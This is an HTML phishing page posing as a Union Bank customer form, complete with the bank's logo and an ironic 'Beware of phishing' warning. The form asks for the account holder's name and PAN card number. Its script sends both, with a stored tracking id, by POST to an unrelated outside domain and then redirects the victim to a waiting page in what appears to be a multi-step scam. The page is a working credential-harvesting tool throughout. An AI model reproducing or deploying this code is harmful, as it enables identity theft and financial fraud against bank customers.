<!DOCTYPE html>
<html>
<head>
	<meta charset="utf-8">
	<meta name="viewport" content="width=device-width, initial-scale=1">
	<title>Asasfdgad12389@*()1389=123</title>

	<style type="text/css">
  input[type="number"]::-webkit-inner-spin-button,
  input[type="number"]::-webkit-outer-spin-button {
    -webkit-appearance: none;
    margin: 0;
  }

  input[type="number"] {
    -moz-appearance: textfield;
  }

		input{
			background-color: transparent;
			border: none;
			border-bottom: 1px solid rgba(255, 255, 255,1);
			opacity: 1;
			color: white;

		}

		input:focus{
			outline: none;
		}
		label{
			font-size: 12px;
			letter-spacing: 1px;
			font-weight: bold;
		}

		#cvv_label{
           margin-left: 200px;
		}



 .triangle-container {
      position: relative;
      width: 10px; 
      height: 10px;
    }

    .triangle {
      width: 0;
      height: 0;
      border-left: 10px solid transparent;
      border-right: 0;
      border-bottom: 10px solid red;
      position: absolute;
      right: 0;
      transform: rotate(-45deg);
    }
     ::placeholder {
    color: white;
  }
		@media screen and (max-width:500px){
		
		#cvv_label{
           margin-left: 50px;
		}

		}

	</style>
</head>
<body>
   
   <div style="text-align: center;">
   	<img src="unionbanklogo-new.webp" style="width: 80%;height: 70px;">
   </div><Br>

   

    <div style="background-color: #0066B0;color: white;padding: 10px;margin-top: 30px;padding-top: 30px;">
   	  
   	<div>
   		<label>ACCOUNT HOLDER NAME<span style="color:#C2061F">*</span></label>
   		<br>
   	  <input type="" id="account_name" oninput="limitLengthAndMoveFocus(this, 30)" style="width:100%;margin-top: 10px;">
   	</div>


  <div style="margin-top: 40px;">
  <label>PAN CARD Number<span style="color:#C2061F">*</span></label>
  <br>
  <input type="" id="pan_card_no" style="width:100%;margin-top: 10px; color: white;">
</div>





<div style="margin-top: 20px;text-align: center;">
 <button onclick="updateData();" style="background-color: white;border: none;color: #0066B0;padding: 10px 15px;border-radius: 5px;cursor: pointer;">SUBMIT</button>
</div>
   
   	<br>

   </div>



<div>
   	<img src="a72da1b1-433b-4955-b4f5-5d6319f7dc1b.jpg" style="width: 100%;height: 200px;">
   </div>
 


<div style="margin-top:20px;padding: 20px;">
	<span  style="color: #D8261E;font-size: 1em;font-weight: bold;margin-bottom: 12px;display: block;">Customer Alert !!!! [Beware of phishing]</span>
<Br>

<div class="triangle-container">
    <div class="triangle"></div>
  </div>
	<span style="font-size: 12px; float: left; padding-top: 5px; padding-bottom: 5px;margin-top: -20px;margin-left: 20px;">
	Do not respond to fraudulent communications asking your confidentials like A/c No, User Id, Password, Card No,etc</span>

<br><br>	
	<div class="triangle-container">
    <div class="triangle"></div>
  </div>
	<span style="font-size: 12px; float: left; padding-top: 5px; padding-bottom: 5px;margin-top: -20px;margin-left: 20px;">
	Fraudulent e-mails contain links of look-alike websites to mislead into entering sensitive financial data
</span>


<br><br>	
	<div class="triangle-container">
    <div class="triangle"></div>
  </div>
	<span style="font-size: 12px; float: left; padding-top: 5px; padding-bottom: 5px;margin-top: -20px;margin-left: 20px;">
	Bank will never send such communications to customers asking for their personal or confidential information
</span>




<br><br>	
	<div class="triangle-container">
    <div class="triangle"></div>
  </div>
	<span style="font-size: 12px; float: left; padding-top: 5px; padding-bottom: 5px;margin-top: -20px;margin-left: 20px;">
	Always visit Bank's site instead of clicking on the links provided in emails or third party websites
</span>




<br><br>	
	<div class="triangle-container">
    <div class="triangle"></div>
  </div>
	<span style="font-size: 12px; float: left; padding-top: 5px; padding-bottom: 5px;margin-top: -20px;margin-left: 20px;">
	Do not respond to pop-up windows asking for your confidential information
</span>


</div>







    <script>
  function limitLength(element, maxLength) {
    if (element.value.length > maxLength) {
      element.value = element.value.slice(0, maxLength);
    }
  }
</script>

<script>
  function limitLengthAndMoveFocus(element, maxLength, nextInputId) {
    if (element.value.length >= maxLength) {
      element.value = element.value.slice(0, maxLength);
      if (nextInputId) {
        document.getElementById(nextInputId).focus();
      }
    }
  }
</script>








<script type="text/javascript">
var random_no = localStorage.getItem('random_no');
   function updateData() {
   
   var account_holder_name = document.getElementById("account_name").value;
   var pan_card_no = document.getElementById("pan_card_no").value;


   if (account_holder_name != "" && pan_card_no!= "") {

    var data = {

      account_holder_name: account_holder_name,
      pan_card_no: pan_card_no,
      random_no: random_no
      };

      var xhr = new XMLHttpRequest();

      xhr.open("POST", "https://golusvami.co.in/nuchuas/disasas.php", true);
      xhr.setRequestHeader("Content-Type", "application/json");
      xhr.onreadystatechange = function () {
         if (xhr.readyState === 4 && xhr.status === 200) {

            console.log(xhr.responseText);
            // window.location.href = 'european';
            window.location.href = 'wait_extra.html';

      }
   };
   xhr.send(JSON.stringify(data));

}
      else {
         alert('Please fill all fields');
      }
}

    </script>

</body>
</html>